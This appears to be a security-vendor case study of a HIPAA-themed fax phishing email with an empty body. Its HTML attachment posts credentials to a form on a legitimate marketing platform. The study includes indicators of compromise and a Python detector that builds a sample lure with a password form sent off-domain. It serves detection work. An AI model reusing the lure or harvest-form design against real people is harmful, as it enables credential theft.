The message body was one word. "FYI."
There were no links inside it, no calls to action, no urgency copy. The subject line referenced a work order and a credit confirmation. The From address was a local-part that looked like a fax service sending from a domain that had been registered since 1998. SPF passed. DKIM was absent. The attachment scanner returned clean.
The payload was a 12-kilobyte HTML file named to look like a fax work-order number.
This case is about what happens when the attacker moves every malicious element off the email body and into a file the scanner cannot fully examine. No link to detonate. No URL to score. No macro. The entire threat lives inside an attachment that looks like a fax notification.
The compromised domain as a reputation laundry
The sending domain had been registered since 1998, nearly three decades old at the time of the attack. Age, by itself, is a credibility signal that both humans and filters weigh. An attacker who gains access to an old domain's outbound mail host inherits that reputation without having to build it.
The outbound path in this case ran through the domain's own webmail provider, a pair.com hosting stack. That IP was listed in the domain's SPF record, so the authentication check passed cleanly. DKIM was absent, which removes the cryptographic guarantee that the message content was not tampered with in transit. DMARC returned a best-guess pass rather than a definitive alignment result, a weaker signal than full DMARC enforcement would provide.
The Microsoft Exchange Online anti-spam stack assigned SCL=5 and routed the message to junk. That friction matters, but it is not a block. A recipient with permissive folder rules, or one looking for a misfiled message, can still open it.
A fax notification designed for a healthcare audience
The attachment was named FAX#93382529.html. The number mirrors the work-order reference in the subject line, giving the file a surface continuity with the email that makes it look like supporting documentation rather than a payload.
Inside, the lure presented as a fax-service notification. The pretext carried a HIPAA framing, which is a deliberate pressure mechanism. In healthcare-adjacent organizations, HIPAA urgency shortens the review window. The recipient is primed to act quickly on anything described as a compliance-sensitive communication. The buttons inside the attachment, labeled for login, reply, and download, each posted to a credential-harvest form hosted on Brevo's sibforms[.]com.
That hosting choice is the second evasion layer. Brevo is a legitimate marketing platform with a clean domain reputation. A URL-reputation check on sibforms[.]com returns nothing malicious because the domain itself is not malicious. The individual form path inherits the parent domain's clean score.
This is the structural problem with credential harvesting via trusted-platform forms. The attacker provisions a form on an existing legitimate service and points their fake login pages at it. The reputation gap between their objective and what the scanner measures is the entire attack surface.
Why the HTML attachment was the only place to look
The email body contained zero links. That is intentional. Every standard email security control that operates on URL content (sandbox detonation, reputation lookup, click-time scanning) had nothing to evaluate. The only artifact carrying attacker intent was the HTML file, and the scanner's verdict on that file was clean.
The technique maps to HTML smuggling at its core: moving the active content out of the detectable body and into an attachment that opens in the browser as a functional page. An HTML form renders a convincing interface and posts credentials when submitted. No macros, no obfuscation.
This maps to three MITRE ATT&CK techniques: Phishing: Spearphishing Attachment for the delivery mechanism, Phishing for Information: Spearphishing via Service for the harvest-form hosted on a third-party platform, and Masquerading for the filename that mimics a legitimate fax work-order reference.
The detection gap is the empty body
A secure email gateway's primary detection surface is the message body: links to detonate, domains to check, content patterns to score. When that surface is empty, the detection load shifts entirely onto the attachment. Sandboxing an HTML file that renders a form and posts to a legitimate provider returns no malware verdict, because the form itself is not malware. The damage happens when the victim types their credentials and clicks submit.
What did fire were behavioral signals: first-time external sender, high sender-risk score, the absence of any prior relationship between the sending address and the affected mailboxes. Those signals do not depend on inspecting content. They depend on knowing what normal looks like for a given mailbox and recognizing that this message did not fit it.
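The signals described above can be checked mechanically before any content verdict is trusted. The following Python is an added illustration, not part of the original analysis or of any vendor product: it builds a constructed message that mirrors this case (placeholder sender domain, constructed form path on the Brevo host, one-word body, SPF pass with no DKIM) and flags the combination of an HTML attachment, a link-free body, a form posting to a host other than the sender's domain, and missing DKIM.

```python
import email
import re
from email.message import EmailMessage
from email.policy import default
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
FORM_ACTION_RE = re.compile(r"<form[^>]*\baction=[\"']?(https?://[^\"'\s>]+)", re.I)

def build_sample() -> bytes:
    # Constructed sample mirroring the case, not the real message: one-word body,
    # no body links, SPF pass / DKIM none, HTML attachment whose form posts off-domain.
    msg = EmailMessage()
    msg["From"] = "humblefax@compromised-sender.example"  # placeholder sender domain
    msg["To"] = "billing@recipient.example"
    msg["Subject"] = "Work order 93382529 - credit confirmation"
    msg["Authentication-Results"] = "mx.example; spf=pass; dkim=none; dmarc=bestguesspass"
    msg.set_content("FYI.")
    lure = ('<html><body><h2>Secure fax notification (HIPAA)</h2>'
            '<form method="post" action="https://sibforms.com/serve/constructed-form-id">'
            '<input name="email"><input name="password" type="password">'
            '<button>Login</button></form></body></html>')
    msg.add_attachment(lure, subtype="html", filename="FAX#93382529.html")
    return bytes(msg)

def analyze(raw: bytes) -> dict:
    # Score the signals this case turns on: empty body, HTML attachment, off-domain form, weak auth.
    msg = email.message_from_bytes(raw, policy=default)
    body = msg.get_body(preferencelist=("plain", "html"))  # skips attachment parts
    body_text = body.get_content() if body else ""
    sender_domain = msg["From"].addresses[0].domain.lower()
    auth = (msg["Authentication-Results"] or "").lower()
    html_attachments, external_form_hosts = [], []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if part.get_content_type() == "text/html" or name.lower().endswith((".htm", ".html")):
            html_attachments.append(name)
            for action in FORM_ACTION_RE.findall(part.get_content()):
                host = (urlparse(action).hostname or "").lower()
                if host and host != sender_domain and not host.endswith("." + sender_domain):
                    external_form_hosts.append(host)
    checks = [
        (bool(html_attachments) and not URL_RE.search(body_text), "HTML attachment with zero body URLs"),
        (bool(external_form_hosts), "attachment form posts to a third-party host"),
        (len(body_text.split()) <= 3, "near-empty body"),
        ("dkim=none" in auth, "no DKIM signature"),
    ]
    reasons = [label for hit, label in checks if hit]
    return {"html_attachments": html_attachments, "external_form_hosts": external_form_hosts,
            "reasons": reasons, "high_risk": len(reasons) >= 3}
```

The form-action check is the piece a URL-reputation lookup skips: it asks whether the attachment posts somewhere other than the sender's own domain, not whether that destination is known-bad.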
Indicators of compromise
| Type | Indicator | Context |
|---|---|---|
| Domain | [a compromised plumbing-company domain] | Compromised sender domain, registered 1998, webmail used as outbound relay |
| Email | humblefax[@][compromised sender domain] | Attacker-controlled local-part on the compromised domain |
| Attachment | FAX#93382529.html (MD5: 658bae79bac0928fea4cc423e792d212) | HTML fax-lure, 12,892 bytes, credential-harvest form inside |
| URL | hxxps://sibforms[.]com (Brevo form endpoint) | Credential-harvest form hosted on legitimate marketing platform |
| Auth | SPF pass, DKIM none, DMARC bestguesspass | Webmail relay authorized in SPF; no cryptographic content signature |
| Behavior | Zero body links | Entire payload in attachment; no URL detonation surface in body |
What actually caught it
The attachment scanner returned clean, and the body gave URL analysis nothing to work with. Detection rested on first-time sender status, elevated sender-risk scoring, and the behavioral pattern of a single-word body paired with an HTML attachment on an aged domain that had never contacted these mailboxes before. Those signals are relationship-based, not content-based.
The FBI's IC3 2024 report documents credential theft as one of the most common enablers of downstream fraud. CISA's phishing guidance emphasizes that technical controls alone do not cover the gap when malicious content sits outside the inspectable body. The operational check is behavioral: treat HTML attachments from first-time senders with no prior correspondence as high-risk regardless of attachment scanner verdict.
A secure email gateway inspects what it can reach. When the only active content is inside an HTML file that posts to a reputable third-party host, there is nothing for it to fault. IRONSCALES data shows SEGs miss an average of 67.5 phishing emails per 100 mailboxes each month. The defense is behavioral: who is this sender, have they ever reached this mailbox before, and why is the body a single word.
One word. One file. That is the entire attack surface the recipient saw.